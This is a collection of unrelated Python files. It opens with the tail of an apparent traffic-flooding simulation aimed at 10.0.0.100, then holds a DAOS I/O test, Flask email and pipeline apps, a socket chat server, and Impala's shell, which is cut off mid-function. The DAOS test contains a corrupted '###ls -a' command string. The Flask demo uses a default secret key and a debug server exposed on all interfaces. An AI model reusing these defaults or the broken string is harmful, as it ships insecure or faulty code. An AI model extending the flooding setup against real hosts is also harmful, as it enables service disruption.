# print("elapsed: ", str((time.time_ns()-start)/1e9), "s")
# print("len: ", str(len(f)))
# # print("f: ", f)
# exit(0)
# Note: only one server known to flooders "10.0.0.100"
sim_time = 180 # in seconds
client_rate = 10 # new incoming flows per second
collection_interval = 1.0
flows = generateFlows(sim_time, client_rate)
# num_flooders = 1
# nf = len(flows)/num_flooders # evenly divide flows for each flooder
# flooders = [None]*num_flooders
# for i in range(num_flooders):
# flooders[i] = threading.Thread(
# target=flood, args=(flows[int(i*nf):int((i+1)*nf)], i))
# flooders[i].start()
# # wait for flooders to finish
# for i in range(num_flooders):
# flooders[i].join()
flood(sim_time, client_rate, flows, collection_interval)
|
parallel_io.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import threading
import subprocess #nosec
import time
from getpass import getuser
import general_utils
from ClusterShell.NodeSet import NodeSet
from command_utils import CommandFailure
from fio_test_base import FioBase
from ior_test_base import IorTestBase
# pylint: disable=too-many-ancestors
class ParallelIo(FioBase, IorTestBase):
"""Base Parallel IO test class.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a ParallelIo object."""
super().__init__(*args, **kwargs)
self.dfuse = None
self.cont_count = None
self.pool_count = None
self.statvfs_info_initial = None
self.statvfs_before_cont_destroy = None
self.statvfs_after_cont_destroy = None
self.pool = []
self.container = []
def create_pool(self):
"""Create a TestPool object to use with ior."""
self.pool.append(self.get_pool(connect=False))
# pylint: disable=arguments-differ
def create_cont(self, pool):
"""Create a TestContainer object to be used to create container.
Args:
pool (TestPool): TestPool object type for which container
needs to be created
"""
self.container.append(self.get_container(pool))
def stat_bfree(self, path):
"""Get stat bfree.
Args:
path (str): path to get free block size of.
Returns:
int: value of stat free blocks
"""
cmd = ["ssh", "{}@{}".format(getuser(), self.hostlist_clients[0]),
"stat -c%a -f {}".format(path)]
try:
result = subprocess.check_output(cmd)
except subprocess.CalledProcessError as err:
self.fail("Get free block size method failed with: {}".format(err))
return int(result)
def statvfs_pool(self, path):
"""Obtain the free space for the pool using statvfs.
Args:
path (str): path for which free space needs to be obtained for.
Returns:
list: list of free space info for each pool supplied in pool_obj.
"""
statvfs_list = []
for _, pool in enumerate(self.pool):
dfuse_pool_dir = str(path + "/" + pool.uuid)
statvfs_info = self.stat_bfree(dfuse_pool_dir)
statvfs_list.append(statvfs_info)
self.log.info("Statvfs List Output: %s", statvfs_list)
return statvfs_list
def verify_aggregation(self, reduced_space, count):
"""Verify aggregation.
Verify if expected space is returned for each pool after containers
were destroyed. If not, wait for 60 secs and check again. Wait 4 times,
otherwise exit the test with a failure.
Args:
reduced_space (int): expected space to be returned
count (int): aggregation index
"""
counter = 1
while (self.statvfs_after_cont_destroy[count] <
self.statvfs_before_cont_destroy[count] + reduced_space):
# try to wait for 4 x 60 secs for aggregation to be completed
# or else exit the test with a failure.
if counter > 4:
self.log.info("Free space before io: %s",
self.statvfs_info_initial)
self.log.info("Free space after io: %s",
self.statvfs_before_cont_destroy)
self.log.info("Free space at test termination: %s",
self.statvfs_after_cont_destroy)
self.fail("Aggregation did not complete as expected")
time.sleep(60)
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
counter += 1
def test_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to mount dfuse and verify multiple
containers using fio.
Use cases:
Mount dfuse using pool uuid.
Create multiple containers under that dfuse mount point.
Check those containers are accessible from that mount point.
Perform io to those containers using FIO
Delete one of the containers
Check if dfuse is still running. If not, fail the test and exit.
Otherwise, try accessing the deleted container.
This should fail.
Check dfuse again.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,tx,dfuse
:avocado: tags=parallelio
"""
# get test params for cont and pool count
self.cont_count = self.params.get("cont_count", '/run/container/*')
threads = []
# Create a pool and start dfuse.
self.create_pool()
self.start_dfuse(self.hostlist_clients, self.pool[0], None)
# create multiple containers
for _ in range(self.cont_count):
self.create_cont(self.pool[0])
# check if all the created containers can be accessed and perform
# io on each container using fio in parallel
for _, cont in enumerate(self.container):
dfuse_cont_dir = self.dfuse.mount_dir.value + "/" + cont.uuid
cmd = "ls -a {}".format(dfuse_cont_dir)
try:
# execute bash cmds
ret_code = general_utils.pcmd(
self.hostlist_clients, cmd, timeout=30)
if 0 not in ret_code:
error_hosts = NodeSet(
",".join(
[str(node_set) for code, node_set in
list(ret_code.items()) if code != 0]))
raise CommandFailure(
"Error running '{}' on the following "
"hosts: {}".format(cmd, error_hosts))
# report error if any command fails
except CommandFailure as error:
self.log.error("ParallelIo Test Failed: %s",
str(error))
self.fail("Test was expected to pass but "
"it failed.\n")
# run fio on all containers
thread = threading.Thread(target=self.execute_fio, args=(
self.dfuse.mount_dir.value + "/" + cont.uuid, False))
threads.append(thread)
thread.start()
# wait for all fio jobs to be finished
for job in threads:
job.join()
# destroy first container
container_to_destroy = self.container[0].uuid
self.container[0].destroy(1)
# check dfuse if it is running fine
self.dfuse.check_running()
# try accessing destroyed container, it should fail
try:
self.execute_fio(
self.dfuse.mount_dir.value + "/" + container_to_destroy, False)
self.fail(
"Fio was able to access destroyed container: {}".format(
self.container[0].uuid))
except CommandFailure as error:
self.log.info("This run is expected to fail")
# check dfuse is still running after attempting to access deleted
# container.
self.dfuse.check_running()
def test_multipool_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to verify aggregation across multiple
pools and containers.
Use cases:
Create 10 pools
Create 10 containers under each pool.
Record statvfs free space for each pool.
Perform parallel io to each pool without deleting the file
after write.
Record free space using statvfs after write.
Delete half of the containers from each pool.
Calculate the expected amount of data to be deleted when
containers are destroyed.
Record free space after container destroy.
Loop until either the all space is returned back after aggregation
completion or exit the loop after trying for 240 secs of wait and
fail the test.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,dfuse
:avocado: tags=multipoolparallelio
"""
# test params
threads = []
pool_threads = []
cont_threads = []
self.pool_count = self.params.get("pool_count", '/run/pool/*')
self.cont_count = self.params.get("cont_count", '/run/container/*')
processes = self.params.get("np", '/run/ior/client_processes/*')
# Create pools in parallel.
for _ in range(self.pool_count):
pool_thread = threading.Thread(target=self.create_pool())
pool_threads.append(pool_thread)
pool_thread.start()
# wait for container create to finish
for pool_job in pool_threads:
pool_job.join()
# start dfuse.
self.start_dfuse(self.hostlist_clients, None, None)
# record free space using statvfs before any data is written.
self.statvfs_info_initial = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Create 10 containers for each pool. Container create process cannot
# be parallelised as different container create could complete at
# different times and get appended in the self.container variable in
# unorderly manner, causing problems during the write process.
for _, pool in enumerate(self.pool):
for _ in range(self.cont_count):
self.create_cont(pool)
# Try to access each dfuse mounted container using ls. Once it is
# accessed successfully, go ahead and perform io on that location
# using ior. This process of performing io is done in parallel for
# all containers using threads.
for pool_count, pool in enumerate(self.pool):
dfuse_pool_dir = str(self.dfuse.mount_dir.value + "/" + pool.uuid)
for counter in range(self.cont_count):
cont_num = (pool_count * self.cont_count) + counter
dfuse_cont_dir = str(dfuse_pool_dir + "/" +
self.container[cont_num].uuid)
cmd = "###ls -a {}".format(dfuse_cont_dir)
self.execute_cmd(cmd)
# run ior on all containers
test_file = dfuse_cont_dir + "/testfile"
self.ior_cmd.test_file.update(test_file)
self.ior_cmd.set_daos_params(
self.server_group, pool, self.container[cont_num].uuid)
thread = threading.Thread(
target=self.run_ior,
args=(self.get_ior_job_manager_command(), processes, None,
False))
threads.append(thread)
thread.start()
# wait for all ior jobs to be finished
for job in threads:
job.join()
# Record free space after io
self.statvfs_before_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Destroy half of the containers from each pool
pfinal = 0
for count in range(self.cont_count):
pinitial = pfinal
pfinal = pinitial + (self.cont_count // 2)
del self.container[pinitial:pfinal]
for cont in self.container:
cont_thread = threading.Thread(target=cont.destroy)
cont_threads.append(cont_thread)
cont_thread.start()
for destroy_job in cont_threads:
destroy_job.join()
# Record free space after container destroy.
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Calculate the expected space to be returned after containers
# are destroyed.
reduced_space = (self.cont_count *
int(self.ior_cmd.block_size.value))/2
# Verify if expected space is returned for each pool after containers
# were destroyed. If not, wait for 60 secs and check again. Wait 4
# times, otherwise exit the test with a failure.
for count in range(self.pool_count):
thread = threading.Thread(
target=self.verify_aggregation,
args=(reduced_space, count))
threads.append(thread)
thread.start()
for job in threads:
job.join()
|
app.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li
:license: MIT, see LICENSE for more details.
"""
import os
from threading import Thread
import sendgrid
from sendgrid.helpers.mail import Email as SGEmail, Content, Mail as SGMail
from flask_mail import Mail, Message
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField
from wtforms.validators import DataRequired, Email
from flask import Flask, flash, redirect, url_for, render_template, request
app = Flask(__name__)
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
app.config.update(
SECRET_KEY=os.getenv('SECRET_KEY', 'secret string'),
MAIL_SERVER=os.getenv('MAIL_SERVER'),
MAIL_PORT=465,
MAIL_USE_SSL=True,
MAIL_USERNAME=os.getenv('MAIL_USERNAME'),
MAIL_PASSWORD=os.getenv('MAIL_PASSWORD'),
MAIL_DEFAULT_SENDER=('Grey Li', os.getenv('MAIL_USERNAME'))
)
mail = Mail(app)
# send over SMTP
def send_smtp_mail(subject, to, body):
message = Message(subject, recipients=[to], body=body)
mail.send(message)
# send over SendGrid Web API
def send_api_mail(subject, to, body):
sg = sendgrid.SendGridAPIClient(os.getenv('SENDGRID_API_KEY'))
from_email = SGEmail('Grey Li <noreply@helloflask.com>')
to_email = SGEmail(to)
content = Content("text/plain", body)
email = SGMail(from_email, subject, to_email, content)
sg.client.mail.send.post(request_body=email.get())
# send email asynchronously
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, body):
# app = current_app._get_current_object() # if use factory (i.e. create_app()), get app like this
message = Message(subject, recipients=[to], body=body)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
# send email with HTML body
def send_subscribe_mail(subject, to, **kwargs):
message = Message(subject, recipients=[to], sender='Flask Weekly <%s>' % os.getenv('MAIL_USERNAME'))
message.body = render_template('emails/subscribe.txt', **kwargs)
message.html = render_template('emails/subscribe.html', **kwargs)
mail.send(message)
class EmailForm(FlaskForm):
to = StringField('To', validators=[DataRequired(), Email()])
subject = StringField('Subject', validators=[DataRequired()])
body = TextAreaField('Body', validators=[DataRequired()])
submit_smtp = SubmitField('Send with SMTP')
submit_api = SubmitField('Send with SendGrid API')
submit_async = SubmitField('Send with SMTP asynchronously')
class SubscribeForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
submit = SubmitField('Subscribe')
@app.route('/', methods=['GET', 'POST'])
def index():
form = EmailForm()
if form.validate_on_submit():
to = form.to.data
subject = form.subject.data
body = form.body.data
if form.submit_smtp.data:
send_smtp_mail(subject, to, body)
method = request.form.get('submit_smtp')
elif form.submit_api.data:
send_api_mail(subject, to, body)
method = request.form.get('submit_api')
else:
send_async_mail(subject, to, body)
method = request.form.get('submit_async')
flash('Email sent %s! Check your inbox.' % ' '.join(method.split()[1:]))
return redirect(url_for('index'))
form.subject.data = 'Hello, World!'
form.body.data = 'Across the Great Wall we can reach every corner in the world.'
return render_template('index.html', form=form)
@app.route('/subscribe', methods=['GET', 'POST'])
def subscribe():
form = SubscribeForm()
if form.validate_on_submit():
name = form.name.data
email = form.email.data
send_subscribe_mail('Subscribe Success!', email, name=name)
flash('Confirmation email have been sent! Check your inbox.')
return redirect(url_for('subscribe'))
return render_template('subscribe.html', form=form)
@app.route('/unsubscribe')
def unsubscribe():
flash('Want to unsubscribe? No way...')
return redirect(url_for('subscribe'))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True)
|
website.py
|
from flask import Flask, render_template, request
from main import BuildPipeline
from config import Config
from threading import Thread
app=Flask(__name__)
pipeline = None
@app.route('/')
def index():
print("Index!!")
return render_template("index.html")
@app.route('/service/', methods=["GET","POST"])
def registerService():
print("Add Service Called")
if request.form['action'] == "Add Service":
# call add service
print(request.form)
if request.form['parent'] == "":
print('Parent is None')
pipeline.addService(request.form['name'], Config.services[request.form['services']])
else:
pipeline.addService(request.form['name'], Config.services[request.form['services']], request.form['parent'])
else:# request.form.post['action'] == "Remove Service":
# call delelteService
pipeline.removeService(request.form['name'])
# do nothing
return render_template('index.html')
@app.route('/build/', methods=["GET","POST"])
def build():
thread = Thread(target=pipeline.buildPipeline, args=(), daemon=True)
thread.start()
# pipeline.buildPipeline()
return render_template("built.html")
@app.route('/pipeline/', methods=["GET","POST"])
def terminate():
thread = Thread(target=pipeline.terminatePipeline, args=(), daemon=True)
thread.start()
# pipeline.terminatePipeline()
return render_template("index.html")
if __name__ == "__main__":
pipeline = BuildPipeline()
app.run(debug=True)
|
server.py
|
import socket
import threading
# Connection Data
host = '127.0.0.1'
port = 3415
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
# Broadcasting Messages
message = client.recv(1024)
broadcast(message)
except Exception as e:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast(f'{nickname} left!')
nicknames.remove(nickname)
break
def receive():
while True:
# Accept Connection
client, address = server.accept()
print(f"Connected with {str(address)}")
# Request And Store Nickname
client.send('NICK'.encode('utf-8'))
nickname = client.recv(1024).decode('utf-8')
nicknames.append(nickname)
clients.append(client)
print(f"Nickname is {nickname}")
broadcast(f"{nickname} joined!".encode('utf-8'))
client.send('Connected to server!'.encode('utf-8'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print("Server is listening")
receive()
|
impala_shell.py
|
#!/usr/bin/env python
# Copyright 2012 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Impala's shell
import cmd
import csv
import getpass
import prettytable
import os
import signal
import socket
import sqlparse
import sys
import threading
import time
from optparse import OptionParser
from Queue import Queue, Empty
from beeswaxd import BeeswaxService
from beeswaxd.BeeswaxService import QueryState
from ImpalaService import ImpalaService
from ImpalaService.ImpalaService import TImpalaQueryOptions, TResetTableReq
from ImpalaService.ImpalaService import TPingImpalaServiceResp
from Status.ttypes import TStatus, TStatusCode
from thrift.transport.TSocket import TSocket
from thrift.transport.TTransport import TBufferedTransport, TTransportException
from thrift.protocol import TBinaryProtocol
from thrift.Thrift import TApplicationException
VERSION_FORMAT = "Impala Shell v%(version)s (%(git_hash)s) built on %(build_date)s"
COMMENT_TOKEN = '--'
VERSION_STRING = "build version not available"
HISTORY_LENGTH = 100
# Tarball / packaging build makes impala_build_version available
try:
from impala_build_version import get_git_hash, get_build_date, get_version
VERSION_STRING = VERSION_FORMAT % {'version': get_version(),
'git_hash': get_git_hash()[:7],
'build_date': get_build_date()}
except Exception:
pass
class RpcStatus:
"""Convenience enum to describe Rpc return statuses"""
OK = 0
ERROR = 1
class OutputWriter(object):
"""Helper class for saving result set output to a file"""
def __init__(self, file_name, field_delim):
# The default csv field size limit is too small to write large result sets. Set it to
# an artibrarily large value.
csv.field_size_limit(sys.maxint)
self.file_name = file_name
if not field_delim:
raise ValueError, 'A field delimiter is required to output results to a file'
self.field_delim = field_delim.decode('string-escape')
if len(self.field_delim) != 1:
raise ValueError, 'Field delimiter must be a 1-character string'
def write_rows(self, rows, mode='ab'):
output_file = None
try:
output_file = open(self.file_name, mode)
writer =\
csv.writer(output_file, delimiter=self.field_delim, quoting=csv.QUOTE_MINIMAL)
writer.writerows(rows)
finally:
if output_file:
output_file.close()
# Simple Impala shell. Can issue queries (with configurable options)
# Basic usage: type connect <host:port> to connect to an impalad
# Then issue queries or other commands. Tab-completion should show the set of
# available commands.
# Methods that implement shell commands return a boolean tuple (stop, status)
# stop is a flag the command loop uses to continue/discontinue the prompt.
# Status tells the caller that the command completed successfully.
# TODO: (amongst others)
# - Column headers / metadata support
# - A lot of rpcs return a verbose TStatus from thrift/Status.thrift
# This will be useful for better error handling. The next iteration
# of the shell should handle this return paramter.
class ImpalaShell(cmd.Cmd):
DISCONNECTED_PROMPT = "[Not connected] > "
# If not connected to an impalad, the server version is unknown.
UNKNOWN_SERVER_VERSION = "Not Connected"
# Commands are terminated with the following delimiter.
CMD_DELIM = ';'
DEFAULT_DB = 'default'
def __init__(self, options):
cmd.Cmd.__init__(self)
self.user = getpass.getuser()
self.is_alive = True
self.use_kerberos = options.use_kerberos
self.verbose = options.verbose
self.kerberos_service_name = options.kerberos_service_name
self.impalad = None
self.prompt = ImpalaShell.DISCONNECTED_PROMPT
self.connected = False
self.imp_service = None
self.transport = None
self.fetch_batch_size = 1024
self.default_query_options = {}
self.set_query_options = {}
self.query_state = QueryState._NAMES_TO_VALUES
self.refresh_after_connect = options.refresh_after_connect
self.current_db = options.default_db
self.history_file = os.path.expanduser("~/.impalahistory")
self.server_version = ImpalaShell.UNKNOWN_SERVER_VERSION
self.show_profiles = options.show_profiles
# Stores the state of user input until a delimiter is seen.
self.partial_cmd = str()
# Stores the old prompt while the user input is incomplete.
self.cached_prompt = str()
# Tracks query handle of the last query executed. Used by the 'profile' command.
self.last_query_handle = None
self.output_writer = None
if options.output_file:
self.output_writer =\
OutputWriter(options.output_file, options.output_file_field_delim)
try:
self.readline = __import__('readline')
self.readline.set_history_length(HISTORY_LENGTH)
except ImportError:
self.readline = None
if options.impalad != None:
self.do_connect(options.impalad)
# We handle Ctrl-C ourselves, using an Event object to signal cancellation
# requests between the handler and the main shell thread. Ctrl-C is explicitly
# not intercepted during an rpc, as it may interrupt system calls leaving
# the underlying socket unusable.
self.is_interrupted = threading.Event()
signal.signal(signal.SIGINT, self.__signal_handler)
def __print_options(self, options):
if not options:
print '\tNo options available.'
else:
print '\n'.join(["\t%s: %s" % (k,v) for (k,v) in options.iteritems()])
def __options_to_string_list(self):
return ["%s=%s" % (k,v) for (k,v) in self.set_query_options.iteritems()]
def __build_default_query_options_dict(self):
# The default query options are retrieved from a rpc call, and are dependent
# on the impalad to which a connection has been established. They need to be
# refreshed each time a connection is made. This is particularly helpful when
# there is a version mismatch between the shell and the impalad.
get_default_query_options = self.imp_service.get_default_configuration(False)
options, status = self.__do_rpc(lambda: get_default_query_options)
if status != RpcStatus.OK:
print 'Unable to retrive default query options'
for option in options:
self.default_query_options[option.key.upper()] = option.value
def do_shell(self, args):
"""Run a command on the shell
Usage: shell <cmd>
! <cmd>
"""
try:
os.system(args)
except Exception, e:
print 'Error running command : %s' % e
return True
def sanitise_input(self, args, interactive=True):
"""Convert the command to lower case, so it's recognized"""
# A command terminated by a semi-colon is legal. Check for the trailing
# semi-colons and strip them from the end of the command.
args = args.strip()
tokens = args.split(' ')
# The first token is converted into lower case to route it to the
# appropriate command handler. This only applies to the first line of user input.
# Modifying tokens in subsequent lines may change the semantics of the command,
# so do not modify the text.
if not self.partial_cmd:
# The first token is the command.
# If it's EOF, call do_quit()
if tokens[0] == 'EOF':
return 'quit'
else:
tokens[0] = tokens[0].lower()
if interactive:
args = self.__check_for_command_completion(' '.join(tokens).strip())
args = args.rstrip(ImpalaShell.CMD_DELIM)
else:
# Strip all the non-interactive commands of the delimiter.
args = ' '.join(tokens).rstrip(ImpalaShell.CMD_DELIM)
return args
def __check_for_command_completion(self, cmd):
"""Check for a delimiter at the end of user input.
The end of the user input is scanned for a legal delimiter.
If a delimiter is not found:
- Input is not send to onecmd()
- onecmd() is a method in Cmd which routes the user input to the
appropriate method. An empty string results in a no-op.
- Input is removed from history.
- Input is appended to partial_cmd
If a delimiter is found:
- The contents of partial_cmd are put in history, as they represent
a completed command.
- The contents are passed to the appropriate method for execution.
- partial_cmd is reset to an empty string.
"""
if self.readline:
current_history_len = self.readline.get_current_history_length()
# Input is incomplete, store the contents and do nothing.
if not cmd.endswith(ImpalaShell.CMD_DELIM):
# The user input is incomplete, change the prompt to reflect this.
if not self.partial_cmd and cmd:
self.cached_prompt = self.prompt
self.prompt = '> '.rjust(len(self.cached_prompt))
# partial_cmd is already populated, add the current input after a newline.
if self.partial_cmd and cmd:
self.partial_cmd = "%s %s" % (self.partial_cmd, cmd)
else:
# If the input string is empty or partial_cmd is empty.
self.partial_cmd = "%s%s" % (self.partial_cmd, cmd)
# Remove the most recent item from history if:
# -- The current state of user input in incomplete.
# -- The most recent user input is not an empty string
if self.readline and current_history_len > 0 and cmd:
self.readline.remove_history_item(current_history_len - 1)
# An empty string results in a no-op. Look at emptyline()
return str()
elif self.partial_cmd: # input ends with a delimiter and partial_cmd is not empty
if cmd != ImpalaShell.CMD_DELIM:
completed_cmd = "%s %s" % (self.partial_cmd, cmd)
else:
completed_cmd = "%s%s" % (self.partial_cmd, cmd)
# Reset partial_cmd to an empty string
self.partial_cmd = str()
# Replace the most recent history item with the completed command.
if self.readline and current_history_len > 0:
self.readline.replace_history_item(current_history_len - 1, completed_cmd)
# Revert the prompt to its earlier state
self.prompt = self.cached_prompt
else: # Input has a delimiter and partial_cmd is empty
completed_cmd = cmd
return completed_cmd
def __signal_handler(self, signal, frame):
self.is_interrupted.set()
def precmd(self, args):
# TODO: Add support for multiple commands on the same line.
self.is_interrupted.clear()
return self.sanitise_input(args)
def postcmd(self, status, args):
"""Hack to make non interactive mode work"""
self.is_interrupted.clear()
# cmd expects return of False to keep going, and True to quit.
# Shell commands return True on success, False on error, and None to quit, so
# translate between them.
# TODO : Remove in the future once shell and Impala query processing can be separated.
if status == None:
return True
else:
return False
def do_set(self, args):
"""Set or display query options.
Display query options:
Usage: SET
Set query options:
Usage: SET <option>=<value>
"""
# TODO: Expand set to allow for setting more than just query options.
if not self.connected:
print "Query options currently set:"
self.__print_options(self.set_query_options)
print "Connect to an impalad to see the default query options"
return True
if len(args) == 0:
print "Default query options:"
self.__print_options(self.default_query_options)
print "Query options currently set:"
self.__print_options(self.set_query_options)
return True
tokens = args.split("=")
if len(tokens) != 2:
print "Error: SET <option>=<value>"
return False
option_upper = tokens[0].upper()
if option_upper not in self.default_query_options.keys():
print "Unknown query option: %s" % (tokens[0],)
print "Available query options, with their default values are:"
self.__print_options(self.default_query_options)
return False
self.set_query_options[option_upper] = tokens[1]
self.__print_if_verbose('%s set to %s' % (option_upper, tokens[1]))
return True
def do_unset(self, args):
"""Unset a query option"""
if len(args.split()) != 1:
print 'Usage: unset <option>'
return False
option = args.upper()
if self.set_query_options.get(option):
print 'Unsetting %s' % option
del self.set_query_options[option]
else:
print "No option called %s is set" % args
return True
def do_quit(self, args):
"""Quit the Impala shell"""
self.__print_if_verbose("Goodbye")
self.is_alive = False
# None is crutch to tell shell loop to quit
return None
def do_exit(self, args):
"""Exit the impala shell"""
return self.do_quit(args)
def do_connect(self, args):
"""Connect to an Impalad instance:
Usage: connect <hostname:port>
connect <hostname>, defaults to port 21000
"""
tokens = args.split(" ")
if len(tokens) != 1:
print ("CONNECT takes exactly one argument: <hostname:port> or"
" <hostname> of the impalad to connect to")
return False
# validate the connection string.
host_port = [val for val in tokens[0].split(':') if val.strip()]
if (':' in tokens[0] and len(host_port) != 2) or (not host_port):
print "Connect string must be of form <hostname:port> or <hostname>"
return False
elif len(host_port) == 1:
host_port.append(21000)
self.impalad = tuple(host_port)
if self.__connect():
self.__print_if_verbose('Connected to %s:%s' % self.impalad)
self.__print_if_verbose('Server version: %s' % self.server_version)
self.prompt = "[%s:%s] > " % self.impalad
if self.refresh_after_connect:
self.cmdqueue.append('refresh' + ImpalaShell.CMD_DELIM)
if self.current_db:
self.cmdqueue.append('use %s' % self.current_db + ImpalaShell.CMD_DELIM)
self.__build_default_query_options_dict()
self.last_query_handle = None
# In the case that we lost connection while a command was being entered,
# we may have a dangling command, clear partial_cmd
self.partial_cmd = str()
# Check if any of query options set by the user are inconsistent
# with the impalad being connected to
for set_option in self.set_query_options.keys():
if set_option not in set(self.default_query_options.keys()):
print ('%s is not supported for the impalad being '
'connected to, ignoring.' % set_option)
del self.set_query_options[set_option]
return True
def __connect(self):
if self.transport is not None:
self.transport.close()
self.transport = None
self.connected = False
self.server_version = ImpalaShell.UNKNOWN_SERVER_VERSION
try:
self.transport = self.__get_transport()
self.transport.open()
protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
self.imp_service = ImpalaService.Client(protocol)
try:
result = self.imp_service.PingImpalaService()
self.server_version = result.version
self.connected = True
except Exception, e:
print ("Error: Unable to communicate with impalad service. This service may not "
"be an impalad instance. Check host:port and try again.")
self.transport.close()
raise
except Exception, e:
print "Error connecting: %s, %s" % (type(e),e)
# If a connection to another impalad failed while already connected
# reset the prompt to disconnected.
self.prompt = self.DISCONNECTED_PROMPT
return self.connected
def __get_transport(self):
"""Create a Transport.
A non-kerberized impalad just needs a simple buffered transport. For
the kerberized version, a sasl transport is created.
"""
sock = TSocket(self.impalad[0], int(self.impalad[1]))
if not self.use_kerberos:
return TBufferedTransport(sock)
# Initializes a sasl client
def sasl_factory():
sasl_client = sasl.Client()
sasl_client.setAttr("host", self.impalad[0])
sasl_client.setAttr("service", self.kerberos_service_name)
sasl_client.init()
return sasl_client
# GSSASPI is the underlying mechanism used by kerberos to authenticate.
return TSaslClientTransport(sasl_factory, "GSSAPI", sock)
def __get_sleep_interval(self, start_time):
"""Returns a step function of time to sleep in seconds before polling
again. Maximum sleep is 1s, minimum is 0.1s"""
elapsed = time.time() - start_time
if elapsed < 10.0:
return 0.1
elif elapsed < 60.0:
return 0.5
return 1.0
def __create_beeswax_query_handle(self):
handle = BeeswaxService.Query()
handle.hadoop_user = self.user
return handle
def __construct_table_header(self, handle):
""" Constructs the table header for a given query handle.
Should be called after the query has finished and before data is fetched. All data
is left aligned.
"""
metadata = self.__do_rpc(lambda: self.imp_service.get_results_metadata(handle))
table = prettytable.PrettyTable()
for field_schema in metadata[0].schema.fieldSchemas:
table.add_column(field_schema.name, [])
table.align = "l"
return table
def __expect_result_metadata(self, query_str):
""" Given a query string, return True if impalad expects result metadata"""
excluded_query_types = ['use', 'alter', 'create', 'drop']
if True in set(map(query_str.startswith, excluded_query_types)):
return False
return True
def __query_with_results(self, query):
self.__print_if_verbose("Query: %s" % (query.query,))
start, end = time.time(), 0
(handle, status) = self.__do_rpc(lambda: self.imp_service.query(query))
if self.is_interrupted.isSet():
if status == RpcStatus.OK:
self.__cancel_query(handle)
return False
if status != RpcStatus.OK:
return False
loop_start = time.time()
while True:
query_state = self.__get_query_state(handle)
if query_state == self.query_state["FINISHED"]:
break
elif query_state == self.query_state["EXCEPTION"]:
print 'Query aborted, unable to fetch data'
if self.connected:
log, status = self._ImpalaShell__do_rpc(
lambda: self.imp_service.get_log(handle.log_context))
print log
return self.__close_query_handle(handle)
else:
return False
elif self.is_interrupted.isSet():
return self.__cancel_query(handle)
time.sleep(self.__get_sleep_interval(loop_start))
# impalad does not support the fetching of metadata for certain types of queries.
if not self.__expect_result_metadata(query.query):
self.__close_query_handle(handle)
return True
table = self.__construct_table_header(handle)
# Results are ready, fetch them till they're done.
self.__print_if_verbose('Query finished, fetching results ...')
result_rows = []
num_rows_fetched = 0
while True:
# Fetch rows in batches of at most fetch_batch_size
(results, status) = self.__do_rpc(lambda: self.imp_service.fetch(
handle, False, self.fetch_batch_size))
if self.is_interrupted.isSet() or status != RpcStatus.OK:
# Worth trying to cleanup the query even if fetch failed
if self.connected:
self.__close_query_handle(handle)
return False
num_rows_fetched += len(results.data)
result_rows.extend(results.data)
if len(result_rows) >= self.fetch_batch_size or not results.has_more:
rows = [r.split('\t') for r in result_rows]
try:
map(table.add_row, rows)
# Clear the rows that have been added. The goal is is to stream the table
# in batch_size quantums.
print table
table.clear_rows()
except Exception, e:
# beeswax returns each row as a tab separated string. If a string column
# value in a row has tabs, it will break the row split. Default to displaying
# raw results. This will change with a move to the hiverserver2 interface.
# Reference: https://issues.cloudera.org/browse/IMPALA-116
print ('\n').join(result_rows)
result_rows = []
if self.output_writer:
# Writing to output files is also impacted by the beeswax bug mentioned
# above. This means that if a string column has a tab, it will break the row
# split causing the wrong number of fields to be written to the output file.
# Reference: https://issues.cloudera.org/browse/IMPALA-116
self.output_writer.write_rows(rows)
if not results.has_more:
break
# Don't include the time to get the runtime profile in the query execution time
end = time.time()
self.__print_runtime_profile_if_enabled(handle)
self.__print_if_verbose(
"Returned %d row(s) in %2.2fs" % (num_rows_fetched, end - start))
self.last_query_handle = handle
return self.__close_query_handle(handle)
def __close_query_handle(self, handle):
"""Close the query handle"""
self.__do_rpc(lambda: self.imp_service.close(handle))
return True
def __print_runtime_profile_if_enabled(self, handle):
if self.show_profiles:
self.__print_runtime_profile(handle)
def __print_runtime_profile(self, handle):
profile = self.__get_runtime_profile(handle)
if profile is not None:
print "Query Runtime Profile:"
print profile
def __print_if_verbose(self, message):
if self.verbose:
print message
def __parse_table_name_arg(self, arg):
""" Parses an argument string and returns the result as a db name, table name combo.
If the table name was not fully qualified, the current database is returned as the db.
Otherwise, the table is split into db/table name parts and returned.
If an invalid format is provide, None is returned.
"""
if not arg:
return None
# If a multi-line argument, the name might be split across lines
arg = arg.replace('\n','')
